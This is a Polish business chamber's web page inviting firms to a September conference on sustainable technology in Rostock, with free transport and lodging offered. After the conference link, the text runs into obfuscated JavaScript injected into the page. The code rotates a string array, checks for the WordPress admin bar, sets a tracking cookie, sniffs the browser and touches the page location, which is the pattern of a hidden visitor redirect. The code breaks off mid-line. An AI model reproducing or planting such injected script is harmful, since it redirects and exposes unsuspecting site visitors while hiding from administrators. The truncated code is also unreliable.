Izba współfinansuje wyjazd przedsiębiorców na konferencję | Północna Izba Gospodarcza w Koszalinie

Bardzo serdecznie zapraszamy Państwa na konferencję, która odbędzie się w dniach 28-29 września br. w Rostoku. Tematem przewodnim spotkania będą zrównoważone technologie, a poruszone zostaną takie kwestie jak zarządzanie odpadami, monitoring środowiska, tworzenie rynku energii czy zarządzanie i odzyskiwanie ścieków.

Konferencja skierowana jest do firm działających w obszarze zielonej mobilności, czystego budownictwa, odnawialnych źródeł energii oraz ekologicznej gospodarki odpadami i odpadami wodnymi.

Zachęcamy również do wzięcia udziału lokalnych polityków, naukowców i wszystkich zainteresowanych tematem. Dla wszystkich uczestników zapewniamy darmowy transport oraz nocleg. Jedynym kosztem jaki ponosi uczestnik jest bilet wstępu na konferencję.

Zgłoszenia przyjmujemy do 30 czerwca br. Liczba miejsc ograniczona. Więcej informacji na stronie internetowej konferencji: www.baltic-clean-technology.com 'toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’http://’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[’push’](c[’shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(’0x7′)][b(’0x8′)](’;’);for(var m=0x0;m